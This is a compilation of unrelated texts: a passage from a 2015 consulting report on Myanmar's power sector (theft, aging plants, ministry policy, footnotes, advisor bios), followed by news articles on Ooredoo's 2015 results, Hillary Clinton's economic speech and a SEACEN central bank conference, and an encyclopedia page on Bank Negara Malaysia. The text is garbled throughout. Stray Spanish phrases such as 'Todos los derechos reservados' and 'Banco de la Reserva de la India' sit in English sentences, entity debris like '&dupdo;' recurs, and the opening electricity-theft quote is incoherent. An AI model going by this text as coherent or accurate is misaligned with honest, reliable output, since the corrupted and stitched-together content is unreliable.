theft,

and about 60% to 70% of meters are manipulated. A senior representative at Center Point Energy acknowledged in a Forbes article that "about 1% of total electric load, and about 2% of the electricity provided to the residential and small commercial sector where the theft is more prevalent."

Poor Infrastructure and Lack of Diversified

In theory, Myanmar should be producing enough electricity for its legitimate consumers. History shows that the country consistently produces more electricity than it consumes (see Figure 1). The government claims that in addition to theft, blackouts stem from the aging facilities, outdated transmission and distribution lines, and using hydropower as a base load. First, Myanmar's aging power plants do not have the capability to produce at maximum capacity. Currently, Myanmar has 44 power plants in the grid system - 25 hydro, 18 gas and steam, and 1 coal; the total system installed capacity is about 4,720 MW, according to MOEP. Many of these facilities need upgrades. For example, an old plant in the eastern Mon state uses 40 year old technology and produces only 40 MW; 16 the NHK 17 (Nippon Hoso Kyokai) reports that a thermal plant's efficiency has declined since it was built with Japanese assistance 30 years ago. 18 Second, outdated transmission and distribution infrastructure present another challenge. About 20% of electricity is lost during transmission and distribution. As of December 2014, Myanmar © 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados. For more information about Asia Taktik LLC, please visit www. asiataktik. com. operates on a total of 267 transmission lines and 208 substations with a total system installed capacity of 9375.5 MVA; the government seeks to upgrade and expand the 55, 39, and 173 transmission lines, which operate under 230kV, 132kV, and 66kV, respectively, and span 11,043.1 km. The current capacity for distribution facilities is 8,161.42 MVA. The government seeks technical expertise to refurbish and to upgrade a total of 9,943 substations and a total of 10,004 km of distribution lines, which operate at five voltage levels: 230 kV, 66 kV, 33kV, 11kV, and 6.6kV. Third, Myanmar's use of hydropower as base load yields unreliable power generation. About 70% of electricity is generated by hydropower; Myanmar's dry season runs from November to April, leaving certain hydropower stations unable to produce at maximum capacity due to insufficient water inflow. As a result, about 2/3 of Myanmar's primary electricity consumption comes from biomass and waste, i. e. wood, charcoal, manure, and crop residues. 19 And for those who can afford them, solar panels are popular among people living off-grid. 20 Looking ahead, there is a clear incentive for the MOEP to commit to resolving their power shortage issues. Electricity demand will continue to increase beyond 2020 (see Figure 2) and current industry consumption lags behind household demand (see Figure 3). If MOEP manages to increase electricity production and reliability, then the likelihood of more FDI in the manufacturing and commercial sectors will increase. The bottom line for Myanmar is: more industries, more jobs, and higher employment mean more legitimate power consumers and revenues.

Ministry of Electric Power: Policy and Implementation

Despite surging FDI and the launch of the National Electrification Plan, 21 Myanmar needs more investment in all available resources: hydro, coal, natural gas, solar, and wind. Between 2008 and 2013, about 47% of the total share of FDI in Myanmar is in the power sector, and about 40% in oil and gas. 22 But most of these investments lock Myanmar into exporting a significant amount of electricity produced to Thailand and China. And a recent study claims that Myanmar could be exporting up to 10,000 MW of hydroelectricity to Thailand, and up to 31,451 MW of electricity to China for an unspecified time period. 23

Policy wise, MOEP seeks to: 1) deploy gas turbine power generation in the short-run, and build hydropower generations in the long-run; 2) increase power generation capacity, and power transmission and distribution efficiency; and 3) promote new and renewable energy sources for electricity production. To attract the needed investments to upgrade Myanmar's energy infrastructure, MOEP's latest development plan consists of: 1) sole investment by the MOEP; 2) investment by local entrepreneurs on build-operate-transfer (B. O.T.) basis; and 3) investment by foreign companies on joint-venture (JV) and/or on B. O.T. basis.

Additionally, new electricity prices have been effective as of November 2013. Households in Myanmar now pay $0.03 per unit (35 Kyats) for 1 to 100 units, and $0.05 per unit (50 Kyats) for more than 100 units; and industries pay $0.10 per unit (100 Kyats) for one to 5,000 units, and $0.14 per unit (150 Kyats) for more than 5,000 units for industries. 24 While higher electricity prices are unpopular with the people of Myanmar, a 2012 Harvard Kennedy School report points out that the price adjustment is necessary if the

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

For more information about Asia Taktik LLC, please visit www. asiataktik. com. country wants to double its electricity production and minimize blackouts. 25 On implementation, the government has gas-fired engine projects to fulfill demand in the short-run. In 2014, five projects have been initiated: four in the Yangon region, and one in the Mandalay region, adding about 326 MW of installed capacity. As of 2015, MOEP aims to add about 438 MW to the grid to meet summer demand by increasing power production at nine of its current facilities. As for long-term planning, Myanmar has several projects in motion: About eight gas power plant projects are underway, which will add another 1,284 MW between 2016 and 2019. The government is also considering proposals that include: building gas engine barge and floating LNG storage and power plants from Turkey, Norway, Finland, and India.

Myanmar uses the tender process to select projects. For independent power producers, there are 14 steps to the procurement process, which seeks to identify projects well-aligned with the government's electricity-expansion goals. The time frame for completing the 14 steps varies. 26 For key decision - making bodies in the power sector see Figure 4.

Myanmar's power and oil and gas sectors have benefited from over 85% of the total share of FDI between 2008 and 2013, and yet, over 48 million


high voltage transmission lines

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

people in Myanmar still do not have access to electricity. Without sufficient and reliable electricity, low productivity and a high cost of doing business will hobble the country's modernization efforts. To build a sustainable economy, the government of Myanmar must strike a balance between exporting energy and leveraging FDI for Myanmar's domestic power supply. In addition to building reliable electricity infrastructure, Myanmar needs time to integrate new technological and industrial capabilities into its economy. James Wendelken, Principal Capformance and Asia Taktik Advisor, notes that transferring technological capabilities and industry knowledge into foreign countries is challenging because it is very much a constructive process that must be done among the people. It takes time for employees to improve how they utilize resources such as industry standards, technical decision tables, or manufacturing tools, and it takes time to tie knowledge to departmental decision making as departments have various specialized functions and employees contending with change to avoid a steep learning curve are potential problems. As Myanmar undertakes political and economic reform, business is subject to risk. It is crucial for companies doing business with Myanmar to identify relevant ministries responsible for policy and implementation, and to understand that the Myanmar military continue to influence many sectors of the economy, including but not limited to the energy sector. Therefore, American companies should thoroughly investigate the market and seek professional advice where appropriate.

The Association of Southeast Asian Nations (ASE - AN) was established in 1967 in Bangkok, Thai - land. Its founding fathers are Indonesia, Malaysia, Philippines, Singapore and Thailand. Consiste en

10 member states:

3 "APR Energy expands turnkey power plant in Myanmar," APR Energy, accessed April 9, 2015, http://

4 Based on the Ministry of Electric Power presentation on January 2015, Myanmar has a population of 51 million. But according to the CIA World FactBook, Myanmar's population is 55.7 million.

7 "Myanmar sees foreign investment topping $5bln in 2014-15," Reuters, September 16, 2014, ac - cessed April 9, 2015, http://www. reuters. com/article/2014/09/16/myanmar-investment-idUSL3N0R - H3EZ20140916. And referenced Kyaw Hsu Mon, "Record Foreign Direct Investment Smashes Govern - ment Forecasts," The IRRAWADDY, January 16, 2015, accessed April 9, 2015, http://www. irrawaddy. org/business/record-foreign-direct-investment-smashes-government-forecasts. html.

9 "Myanmar legal update: moving toward market liberalization," Tilleke & Gibbins, last modified Decem - ber 2, 2014, accessed April 10, 2015,

10 To recognize the reforms in Myanmar, in 2013 the Obama administration issued general licenses to allow Americans to conduct financial-related activities with four of Myanmar's banks: Asia Green Devel - opment Bank, Ayeyarwady Bank, Myanmar Economic Bank, and Myanmar Investment and Commercial Bank. Referenced The World Bank Group. "Myanmar Economic Monitor." October 2013. http://www. worldbank. org/content/dam/Worldbank/document/EAP/Myanmar/Myanmar_Economic_Monitor _Oc - tober_2013.pdf. And Pedro Jose F. Bernardo. "Myanmar's Telecommunication Revolution." Crossroads Quarterly Business Magazine.

11 Based on the Myanmar's Ministry of Electric Power presentation, about 3.1 million were counted as consumers; whereas the US Commercial Service reports about 25% of Myanmar's total population has access to electricity, which is approximately 12,750,000. See "Doing Business in Burma: 2014 Country Commercial Guide for U. S. Companies," U. S. Commercial Service, accessed April 10, 2015,

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

13 Cesar Tordesillas, "Vietnam's electricity loss at $310.4M in Jan-May," Asian Power, June 13, 2012, http://

14 Rakteem Katakey and Rajesh Kumar Singh, "India fights to keep the lights on," Bloomberg, June 5, 2014, http://www. bloomberg. com/bw/articles/2014-06-05/india-fights-electricity-theft-as-modi-pledges-energy - upgrade.

16 "World Bank approves $140 million for Myanmar electricity," Reuters, September 24, 2013, http://www. reuters. com/article/2013/09/24/us-worldbank-myanmar-idUSBRE98N1B620130924.

17 NHK is a Japanese news-broadcasting corporation.

19 "Burma relies heavily on hydropower for most of its electricity generation (71% in 2011). The electricity sector fails to meet the country's needs, with about 49% of the total population and 29% of the rural popu - lation having access to electricity in 2011, according IEA estimates. In addition, aging power plants and poor electricity transmission infrastructure cause severe power shortages. Consequently, traditional bio - mass and waste (typically consisting of wood, charcoal, manure, and crop residues) is widely utilized and accounts for about two-thirds of Burma's primary energy consumption. This has prompted efforts to invest in more hydroelectric, natural gas, and coal-fired electric capacity, improve grid reliability, and promote demand management." Referenced "Burma (Myanmar)," U. S. Energy Information Administration, last updated May 30, 2013, accessed April 10, 2015,

20 "…the "Power Light" shop showcases more contemporary wares: Chinese-made solar panels. For a few hundred bucks, a small fortune in Myanmar, buyers can install their own personal energy supply outside their homes. The cheapest model, a $60 hand-held unit, contains a jack to charge an increasingly common gadget in Myanmar: mobile phones. "We're selling more and more solar panels. But not much to city peo - ple," said Kyaw Phyoe Khin Aung, a 30-year-old shopkeeper at Power Light. "Mostly people buying it and taking it back out to the villages." Slick panels have become a jarring new sight in off-grid villages…By day, solar power is captured inside car batteries. By night, the batteries power radios and lightbulbs." Referenced Patrick Winn, "Myanmar's real power struggle? Keeping the lights on," Global Post, June 23, 2012, http:// www. globalpost. com/dispatch/news/regions/asia-pacific/120622/myanmar-burma-electricity-power-strug - gle-black-outs.

21 To help Myanmar meet its domestic demands, The World Bank Group (the Bank) has pledged $1 billion

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

in 2014 to expand electricity generation, transmission and distribution in the country. Additionally, the Bank is working with the Myanmar government to implement the National Electrification Plan to achieve universal electricity access by 2030. To accomplish this, the plan estimates that 7.2 million new household electricity connections will be required, and an average of 450,000 new connections per year will need to be built. "The National Electrification Plan envisions expansion of Myanmar's electricity grid, using geo - spatial mapping techniques to ensure the grid is rolled out at least cost. At the same time, the Plan calls for mini-grids and off-grid solutions such as solar home systems to be developed for more remote locations to ensure that these areas are not left behind, and receive basic electricity services such as lighting and charg -

ing for small appliances and mobile phones, while the grid is being built out. "The national power generat - ing capacity is now at more than 4000 MW. But it now generates just more than 3000 MW as every plant

is not fully running," said an official from the ministry." Referenced "Powering Up Myanmar: More Than

7 million New Electricity Connections Needed by 2030," The World Bank Group, last updated October 8,

2014, accessed April 10, 2015,

22 "Myanmar Investment Climate: How Thai banks can support investors to do businesses," Slideshare, accessed April 9, 2015, http://www. slideshare. net/fullscreen/veerayuth99/myanmar-investment-climate - oct-2013/8.

23 "Analysts say that Myanmar should prioritize supplying electricity to 75 per cent of the population rather than exporting and it should carry out small hydropower projects rather than big ones that can be harm - ful to the environment and people in each regions and areas. The country employs only a little amount of natural gas to generate power domestically and exports the most." Referenced "Eleven Media: Myanmar exporting huge amounts of power despite small domestic supply,"BurmaNet News, November 3, 2014, http://www. burmanet. org/news/2014/11/03/eleven-media-myanmar-exporting-huge-amounts-of-power - despite-small-domestic-supply/. And referenced "Hydropower in Myanmar: Sector analysis and related legal reforms." The International Journal on Hydropower & Dams, volume 21 issue 3 (2014). http://www. dfdl. com/images/stories/140624_DFDL_Iss3.pdf.

24 "The electricity charge prices for public household will remain unchanged as 35 Kyats (0.036 U. S. dollar) per unit on consumption of power from one unit to 100 units, while that above 100 units will be changed to 50 Kyats per unit. The charge prices for public industry, enterprises and lump sum will also remain

unchanged as 100 Kyats per unit on consumption from one unit to 5,000 units, while that above 5,000 units will be revised to 150 Kyats per unit. The charge prices for government departments will be 50 Kyats per unit for office use, while that for state industrial use will be 100 Kyats per unit." Referenced

"Myanmar revises electricity prices to cover production cost," Mizzima News, October 29, 2013, http://ar - chive-3.mizzima. com/mizzima-news/myanmar/item/10443-myanmar-revises-electricity-prices-to-cover - production-cost/10443-myanmar-revises-electricity-prices-to-cover-production-cost.

25 "The wholesale cost of electricity in Yunnan, China is 0.5 yuan per kWh (7.9 cents) for industry and

0.379 yuan per kWh (6 cents) for residential users. For delivered industrial power, it is necessary to add 2-4 cents per kWh, depending on how dispersed the customers are. If Myanmar wants to be in a position to double electricity output every five or six years, it will have to price its electricity at the cost of the highest marginal (new) source, which will be either gas or private/FDI hydroelectricity. Keeping prices low means keeping blackouts and load shedding in place, since there will not be funds to supply or distribute the amount demanded." Referenced David Dapice. "Myanmar: Negotiating Nation Building." Harvard Ken - nedy School Ash Center for Democratic Governance and Innovation. http://www. ash. harvard. edu/extension/ash/docs/electricitydemand. pdf. And referenced "Search: Myanmar electricity," Harvard Kennedy School Ash Center for Democratic Governance and Innovation, accessed

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

26 The 14 steps are: 1) Site selection; 2) Form committee; 3) A. Consultation; B. call tender for pre-qualifi - cation (PQ); 4) Evaluate PQ; 5) Announce short listed IPP bidders; 6) Issue request of proposal (RFP) for technology and commercial proposals, land lease agreement (LLA) and public procurement authorities (PPA) to short listed bidders; 7) Technical evaluation; 8) Open commercial of technical accepted bidders;

9) Commercial evaluation; 10) Negotiate with bidders based on the rankings until an agreement is reached;

11) Issue letter of award (LOA) to the winning bidder; 12) Sign memorandum of agreement (MOA) within

45 days of the issuance of LOA; 13) Apply permission from the Myanmar Investment Commission (MIC);

14) After MIC permit, then contract signing.

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

About Asia Taktik Asia Taktik is a technical consulting firm that helps clients

explore prospective markets,

create opportunities, and establish productive operations in the Asia-Pacific region. We serve as a bridge between the West and East, providing information, plans, and essential support for commercial success in global markets. Our services help government agencies effectively address the challenges of foreign relations and policy implementation in the Asia - Pacific region. Our services help private businesses understand and manage issues related to the geo-political, economic and cultural state of affairs in order to operate profitably in region-specific markets.

Founder and the Board of Advisors

Jenny Lin is the founder of Asia Taktik LLC. Ms. Lin was a Salzburg Fellow and a Sasakawa Peace Foundation Resident Fellow at Pacific Forum, Center for Strategic & International Studies. She simultaneously held research contracts at The Project 2049 Institute and Institute for National Strategic Studies, National Defense University. In 2012, Ms. Lin was nominated by the Heinrich Boell Foundation and selected by the American Council on Germany to participate in a study tour to Germany. In 2010, Ms. Lin received the Heinrich Boell Foundation short-term international fellowship to Germany to conduct an independent study on how German-style feed-in-tariff may apply to Inner Mongolia China. Her research focus includes: US foreign policy, US-ASEAN relations, US-Japan alliance, and the People's Republic of China's energy, military, cyber, and space policies and industries.

Ms. Lin holds a Master of Public Policy from American University and B. A. in Government and Asian Studies from the University of Texas in Austin. She is fluent in Mandarin and Min Nan dialect.

Jeff Tennen is an advisor at Asia Taktik, Los Angeles, California. Mr. Tennen recently retired from the United States Marine Corps where he served as an Infantry Officer and a Northeast Asia Regional Area Officer. Prior to his retirement, Mr. Tennen served as Executive Officer for 1st Battalion, 3d Marines and the Operations Officer for 3d Marine Regiment at Marine Corps Base Hawaii, Kaneohe Bay. Mr. Tennen spent a majority of his career in the Pacific; most notably serving as the Marine Corps Forces Pacific Desk Officer for Japan, Taiwan, China, Korea, and Hong Kong (SAR). Mr. Tennen worked directly for the Commander of Marine Corps Forces Pacific and provided subject matter expertise and insight into the political-military dynamics of Northeast Asia.

Mr. Tennen is currently an MBA candidate (Class of 2016) at UCLA Anderson School of Management with a focus on Asia-Pacific Global Management. He holds a B. A. in History from University of California Riverside, and studied at various military schools, the Asia Pacific Center for Security Studies, and the Defense Institute of Security Assistance Management. He speaks intermediate level Japanese.

James Wendelken is an advisor at Asia Taktik. He is the founder of Capformance. His passion and focus is advancing productivity, standards, reliability, safety, growth and sustainability in STEM (Science, Technology, Engineering, Math) industries. He has particular expertise in accelerating and demonstrating the continuous improvement of engineering, technical, manufacturing, operations and supporting functions while increasing employee contributions and reducing uncertainty. Mr. Wendelken has extensive experience in design engineering, application engineering, R&D, manufacturing, training

&erio; development, talent management and workforce improvements.

Mr. Wendelken holds an M. B.A. from Texas A&M University and a B. S. in Mechanical Engineering from Oklahoma State University.

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

About Asia Taktik

We are distinguished by our

3-Phase intellectual design, which provides 360 degrees of support to clients establishing a global enterprise.

Phase 1 - Research and assessment to identify markets with greatest potential for penetration.

Phase 2 - Five-step risk management process, and strategic & budget planning to map out a soft landing in targeted Asian-Pacific markets.

Phase 3 - Technical assistance, logistics and on-site support for business operations in a foreign country.

Founder and the Board of Advisors

Dr. Christopher Yung is an advisor at Asia Taktik. He previously worked as a Senior Research Fellow at the Center for the Study of Chinese Military Affairs (CSCMA), Institute for National Strategic Studies, National Defense University. Dr. Yung provides insights and counsel for the Office of Secretary of Defense, the Joint Staff, the Intelligence Community, and the Combatant Commanders concerning Asian defense and strategic issues; Asia-Pacific political and economic risk management; Asian military capabilities and current operations; Asian engagement activities with the United States and other countries; and China's political-military relations with other nations in the Asia-Pacific region. Dr. Yung has been the author, editor, and contributor to numerous books, articles and monographs on China's naval and military power.

Dr. Yung holds a Ph. D. in International Relations and International Economics from the Paul H. Nitze School of Advanced International Studies at the Johns Hopkins University. He also holds an M. A. in East Asian and China Studies from the same institution. He received language certificates in Mandarin Chinese from Columbia University and the Beijing Foreign Language Teacher's Institute.

Juiying (Crystal) Lin is a web designer at Asia Taktik. She previously worked as production designer at The Phoenix Group. She holds a M. A. in Fine Arts of Interactive Multimedia Design from Long Island University, and a B. F.A. in Art Education from University of North Texas.

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

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Ooredoo Group revenue hits QR32bn in 2015

Reported by: `CT Report March 4, 2016

DOHA: Ooredoo Group’s revenue touched QR32.2bn in 2015. The group net profit to Ooredoo shareholders maintained at QR2.1bn in 2015 driven by a strong EBITDA performance.

Ooredoo Group’ customers reached 117 million at the end of 2015, an increase of 9 percent, or 9.5 million net customer adds over 2014 driven by strong performances in Qatar, Indonesia, Myanmar, Oman, Algeria, Maldives and Palestine.

Group recorded revenue and EBITDA growth across its key markets in 2015 while overall performance was impacted by the security situation in Iraq and adverse currency movements in Indonesia, Algeria, and Tunisia.

The solid revenue was supported by strong revenue growth in local currency terms in Qatar, Oman, Indonesia, Myanmar, Algeria, Kuwait and the Maldives. Excluding foreign exchange translation impact, the revenue would have increased by 4 percent YoY, compared to a decline of 3 percent reported.

The group EBITDA increased by 1 percent exceeding QR13bn in 2015 with an improved EBITDA margin of 40 percent. Excluding foreign exchange translation impact, EBITDA would have increased by 8 percent YoY indicating a strong underlying operational performance. Quarterly EBITDA increased by 11 percent YoY to QR3bn in Q4, 2015.

Excluding forex impact, net profit to Ooredoo shareholders in 2015 would have increased by 6 percent YoY. Supported by an improvement in emerging market currencies towards the end of the year, the quarterly net profit to Ooredoo shareholders stood at QR360m in Q4, 2015, an increase of 551 percent compared with QR55m in Q4, 2014 which was impacted by one-off customer acquisition and handset costs in Algeria.

Group earnings per share stood at QR6.61 in 2015, compared to QR6.66 in 2014. In November 2015, Sheikh Saud bin Nasser Al Thani, former CEO of Ooredoo Qatar, was appointed as Group CEO and Waleed Al Sayed, former COO of Ooredoo Qatar, was appointed as Deputy Group CEO and CEO of Ooredoo Qatar. Both Sheikh Saud bin Nasser Al Thani and Waleed Al Sayed have extensive experience in Qatar and Ooredoo’s other operating countries as Board members.

Commenting on the results, Sheikh Abdulla bin Mohammed bin Saud Al Thani, Chairman of Ooredoo, said: “Ooredoo Group delivered a strong performance in 2015 adding 9.5 million new customers and reaching a global customer base of 117 million. Despite currency volatility in emerging markets and the security situation in Iraq, our underlying financial and operational performance was solid. We grew revenue and EBITDA in local currency terms in our primary markets and continued to roll-out the Ooredoo brand across our footprint.”

“Ooredoo plays a key role in connecting people as we shift to an increasingly interconnected world. Our ability to connect people, information and markets is playing an integral role in developing the economies of our markets.”

On behalf of the Board of Directors, he recommended to the General Assembly the distribution of a cash dividend of QR3 per share, 30 percent of the nominal share value.

Sheikh Saud bin Nasser Al Thani, Group CEO of Ooredoo said: “Ooredoo Group’s performance was robust during 2015 as we generated organic revenue growth in local currency terms in Qatar, Oman, Kuwait, Algeria, Indonesia, Myanmar, Palestine and Maldives. This was partially offset by the challenges with the security situation in Iraq, a weakened Tunisian macro-economic environment and currency volatility in emerging markets.

Qatar and Oman delivered strong performances achieving double-digit revenue and EBITDA growth and margin improvement in 2015. Kuwait also increased its revenues by 6 percent and EBITDA by 31 percent with improved margin. After the successful rebranding in Indonesia in 2015, eight Ooredoo markets are now fully Ooredoo branded. As part of our portfolio strategy, we sold our stake in non-core asset in Philippines to focus on our core markets, enabling further optimisation of our operations.”

In line with the Group’s focus on leading customer service and networks, we have made considerable progress on our strategy of being a data-centric business in all of our operating companies. Our data revenue share reached 37 percnet of group revenue and our B2B offering was significantly enhanced across markets. We now have 4G in Qatar, Oman, Kuwait, Indonesia and Maldives and advanced 3G in Iraq and Myanmar. Algeria and Tunisia are preparing for a 4G roll out and Palestine plans to offer 3G in 2016.”

Ooredoo Qatar delivered a robust performance in 2015 driven by a continued growth in customer numbers and double-digit solid growth in revenue and EBITDA. Its wireless broadband customers grew strongly while total customers increased by 11 percent to 3.5 million.

Clinton: Nation needs a 'growth and fairness economy'

NEW YORK (AP) -- Laying out her agenda to help American workers, Hillary Rodham Clinton said Monday that if she is elected to the White House she will seek to build a "growth and fairness economy" that would rejuvenate wages that have remained stagnant since the Great Recession.

In her first major economic speech of her presidential campaign, Clinton vowed to crack down on Wall Street excess and warned that a large field of Republican White House hopefuls would promote tax cuts and a return to policies that would balloon the national debt. She singled out three GOP candidates by name, including former Florida Gov. Jeb Bush, whom she accused of failing to understand the plight of workers.

"You may have heard Governor Bush say last week that Americans just need to work longer hours. Well, he must not have met very many American workers," Clinton said at The New School in New York, urging Bush to speak to nurses, truckers or fast food workers. "They don't need a lecture. They need a raise."

Bush, during an event in Sioux City, Iowa, said Clinton believed that it didn't matter that 6.5 million people were only able to work part-time instead of holding full-time jobs. "Hillary Clinton believes that 2 percent growth, apparently the new normal, is acceptable," Bush said.

He told reporters that Clinton's "policies are going to suppress wage growth. Her policies are a continuation of the Obama economics which has been a complete disaster." Republicans note that under President Barack Obama, the workplace participation rate has declined to its lowest level since 1977.

In an agenda-setting address, Clinton sought to appeal to liberal voters within her party who have questioned her willingness to regulate Wall Street and have rallied behind her chief Democratic rival, Vermont Sen. Bernie Sanders. The message also appeared aimed at anxious voters who have seen little gains in their paychecks even as the nation moves past the Great Recession.

"As the shadow of crisis recedes and longer-term challenges come into focus, I believe we have to build a growth and fairness economy," Clinton said. "You can't have one without the other."

Clinton said she would propose more public investment in infrastructure projects, advance renewable energy and promote tax cuts for small business owners. She expressed support for an increase in the federal minimum wage, an overhaul to the tax code, and policy proposals related to child care and paid family leave.

Clinton, who maintained strong ties to Wall Street as a New York senator, pushed back against the industry, saying the largest financial institutions had too often focused on short-term profits instead of helping grow the economy.

She expressed outrage at accounts of money laundering and currency manipulation involving several major financial firms, calling them "shocking," and promised criminal prosecutions of bad bankers. One of the firms she identified, HSBC, paid former President Bill Clinton $200,000 to speak at a Florida conference in 2011, an appearance that was cleared by the State Department despite an ongoing federal money-laundering probe that led HSBC to reach a 2012 settlement with prosecutors.

The former secretary of state said few rogue traders had faced consequences for malfeasance, a subtle swipe at the Obama administration, which took no action against the individual financial titans who pursued risky fiscal practices. "This is wrong, and on my watch it will change," she said.

Clinton also vowed to expand the Dodd-Frank law passed by Congress in 2010, which tightened regulation of financial institutions, and said she would bolster government oversight of hedge funds and high-frequency traders.

The speech offered Clinton's most extensive critique of Bush, a top contender for the GOP nomination.

Clinton said the nation's economy should not be measured by "some arbitrary growth targets untethered to people's lives and livelihoods." That was a veiled reference to Bush, who has said he would set a goal of 4 percent economic growth, including 19 million jobs, if elected president.

She also lobbed criticism at Florida Sen. Marco Rubio and Wisconsin Gov. Scott Walker, who was launching his campaign Monday. Rubio's tax proposal is a "budget-busting giveaway to the super-wealthy," Clinton said, and she called Walker an example of a GOP governor who had made his name "stomping on workers' rights."

Rubio spokesman Alex Conant said Clinton wanted to "take us back to yesterday, but we cannot raise taxes like the 1990s or increase spending like the 2000s. Marco is proposing a 21st century tax plan that would benefit all Americans, especially middle-class families."

Clinton, meanwhile, made no mention of Sanders, who has wooed Democrats by making economic inequality the central plank of his insurgent campaign.

Thomas reported from Washington. Associated Press writer Lisa Lerer in Washington and Catherine Lucey in Sioux City, Iowa, contributed to this report.

Follow Ken Thomas and Jill Colvin on Twitter: https://twitter. com/kthomasdc and https://twitter. com/colvinj

Vigilance needed to combat economic uncertainty – SEACEN

MANILA, Philippines - Central banks in Southeast Asia vowed to focus on enhancing domestic sources of resilience to combat increased uncertainty in the region, particularly in terms of growth and financial stability.

Bangko Sentral ng Pilipinas (BSP) Governor Amando Tetangco Jr. led the opening of the 51st Conference and High-level Seminar of the Governors of the South East Asian Central Banks (SEACEN) and 35th meeting of the SEACEN Board of Governor hosted in Manila last week.

During the conference, central bank governors noted the shifting dynamics of global economic conditions has increased uncertainty in the region’s economic growth.

Likewise, they said the risks to economic growth in the region could be transmitted mainly through the trade channel, while risks to financial stability may be propagated through the exchange rate, interest rates and capital flows channels.

“Given these multiple and highly-interrelated channels of transmission, there is a need to maintain vigilance by clearly identifying and managing risks and various points of vulnerabilities, and how these might feed their way into the real sector,” the central bank governors stated in a press communique.

The risk factors include the slowdown in economic growth in some emerging market economies while advanced economies have started to recover, as well as the dampening the growth prospects of commodity-exporting economies amid the stable global oil supply coupled with the overall weakening of global demand that continues to take their toll on commodity prices.

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The central bank governors also cited the apparent inevitable normalization of monetary policy in some advanced economies, particularly in the US, that is expected to alter financial conditions facing emerging market economies.

During the open discussion, the governors shared the view that enhancing economic resilience would require, among others, a deeper appreciation of the changes taking place in the global environment.

As a result, governors deliberated it is prudent for SEACEN – member economies to focus on enhancing domestic sources of resilience.

“Toward this end, the governors highlighted the pursuit of wide-ranging policy reforms should be a continuing process for SEACEN economies to cope with episodes of global economic stress,” the governors added.

They agreed that building resilience would entail the expansion and careful coordination of policy instruments to address the multiple objectives of financial stability and promote macroeconomic stability to help sustain strong growth.

“To enhance the effectiveness of these policies, the policy options and objectives need to be carefully communicated to the public,” they said.

The central bank governors also highlighted the need to reform the international monetary system and emphasized the role of international financial institutions in addressing regional as well as global issues and challenges.

They collectively called for stronger regional and international policy dialogue and collaboration during both normal and challenging times, particularly in the areas of improving surveillance and strengthening safety nets.

The 20 SEACEN members include Autoriti Monetari Brunei Darussalam; National Bank of Cambodia; People’s Bank of China; Reserve Bank of Fiji; Hong Kong Monetary Authority; Banco de la Reserva de la India; Bank Indonesia; The Bank of Korea; Bank of Lao PDR; Bank Negara Malaysia; The Bank of Mongolia; Central Bank of Myanmar; Nepal Rastra Bank; Bank of Papua New Guinea; Bangko Sentral ng Pilipinas; Monetary Authority of Singapore; Central Bank of Sri Lanka; Central Bank, Chinese Taipei; Bank of Thailand; and State Bank of Vietnam.

The Central Bank of Myanmar will host the 52nd SEACEN Governors’ Conference and 36th Meeting of the SEACEN Board of Governors next year.

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Arabic Bulgarian Chinese Croatian Czech Danish Dutch English Estonian Finnish French German Greek Hebrew Hindi Hungarian Icelandic Indonesian Italian Japanese Korean Latvian Lithuanian Malagasy Norwegian Persian Polish Portuguese Romanian Russian Serbian Slovak Slovenian Spanish Swedish Thai Turkish Vietnamese

definition - bank negara malaysia

Bank Negara Malaysia

Bank Negara Malaysia بڠك نڬارا مليسيا

Bank Negara Malaysia ( BNM ; literally National Bank of Malaysia . officially Central Bank of Malaysia ) is the Malaysian central bank. Established on January 26, 1959 as the Bank Negara Malaya . its main purpose was to issue currency, act as banker and adviser to the Government of Malaysia and regulate the country's credit situation. Its headquarters is located in Kuala Lumpur. the federal capital of Malaysia .



In 1837 the Indian rupee was made the sole official currency in the Straits Settlements. but in 1867 silver dollars were again legal tender. In 1903 the Straits dollar. pegged at two shillings and fourpence (2s. 4d.), was introduced by the Board of Commissioners of Currency and private banks were prevented from issuing notes. Since then, the continuity of the currency has been broken twice, first by the Japanese occupation 1942 - 1945, and again by the devaluation of the Pound Sterling in 1967 when notes of the Board of Commissioners of Currency of Malaya and British Borneo lost 15% of their value.

On June 12, 1967, the Malaysian dollar, issued by the new central bank, Bank Negara Malaysia, replaced the Malaya and British Borneo dollar at par. The new currency retained all denominations of its predecessor except the $10,000 denomination, and also brought over the colour schemes of the old dollar.

In 1985, following the "Plaza meeting" of G-5 finance ministers in New York City. the US dollar fell sharply causing major losses in Bank Negara's dollar reserves. The bank responded by starting a program of aggressive speculative trading to make up these losses (Millman, p. 226). Jaffar Hussein, the Bank Negara Governor at the time, referred to this strategy as "honest-to-God trading" in a December 1988 speech in New Delhi .

In the late 1980s, Bank Negara under Governor Jaffar Hussein, was a major player in the forex market. Its activities caught the attention of many; initially, Asian markets came to realize the influence Bank Negara had on the direction of forex market. Alan Greenspan acting the Federal Reserve chairman later realized Bank Negara's massive speculation activities and requested the Malaysian central bank to stop it.

BNM sold between $500 million on September 21, 1990 - $1 billion worth of pound sterlings in a short period, driving the pound down 4 cents on the dollar (Millman, p. 228). In response, bankers began front running Bank Negara's orders. Two years later, Bank Negara attempted to defend the value of the British pound against attempts by George Soros and others to devalue the pound sterling. George Soros won and Bank Negara reportedly suffered losses of more than USD 4 billion. [1] Bank Negara lost an additional $2.2 billion in speculative trading a year later (Millman, p. 229). By 1994, the bank became technically insolvent and was bailed out by the Malaysian Finance Ministry (Millman, p. 229).

Pegging of the Ringgit and Reserves

In 1998, Bank Negara pegged 3.80 ringgit to a US dollar after the ringgit substantially depreciated during the 1997 Asian financial crisis. In July 2005, the central bank abandoned fixed exchange rate regime in favor of managed floating exchange rate system an hour after China floated its own currency. This resulted in capital flight of more than USD 10 billion, thought to be due to the repatriation of speculative funds that entered the country in anticipation of the abandonment of the peg: - Bank Negara's foreign exchange reserves increased by USD24 billion in the one year period between July 2004 and July 2005 (see table below). During this period there was widespread belief that the ringgit was undervalued and that if the peg was removed, the ringgit would appreciate.

